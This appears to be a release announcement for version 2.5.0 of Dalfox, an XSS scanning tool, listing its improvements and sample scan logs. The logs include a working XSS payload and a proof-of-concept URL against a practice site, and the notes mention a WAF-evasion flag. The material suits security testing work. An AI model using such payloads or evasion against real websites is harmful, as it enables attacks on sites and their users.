There was a released minor version of Dalfox after a long time. Mainly performance improvement, it detects much better than before :D
https://github.com/hahwul/dalfox/releases/tag/v2.5.0
- Improve scanning
- Improve mining
- Improve logger and output
- Improve silence mode (progress)
- Improve structure of the document page and add contents\
- Add WAF Detection and Evasion (
--waf-evasionflag) - and Fixed bugs
Added Injection point in Log
[I] Reflected query param => PTYPE: URL Injected: /inHTML-none(1) { \ + = ) ` : < [ ( " , . ] ; | - ' > } $
13 line: Sorry, no results were found for <b>1234DalFox</b>. <a href='?'>Try again
[V] Triggered XSS Payload (found DOM Object): query=<xmp><p title="</xmp><svg/onload=alert(1) class=dalfox>
13 line: re found for <b>1234<xmp><p title="</xmp><svg/onload=alert(1) class=dalfox></b>.
[POC][V][GET][inHTML-none(1)-URL] https://xss-game.appspot.com/level1/frame?query=1234%3Cxmp%3E%3Cp+title%3D%22%3C%2Fxmp%3E%3Csvg%2Fonload%3Dalert%281%29+class%3Ddalfox%3E
inHTML-none(1)-URL is injected to HTML Area from URL Query. Please check this documents
WAF Detection
[I] Found 0 testing point in DOM base parameter mining
[I] Found WAF: 360 Web Application Firewall (360)
[I] Content-Type is text/html; charset=utf-8is 🔍
[I] Reflected PATH '/test/path/dalfoxpathtest' => Injected: /inATTR-double(1)]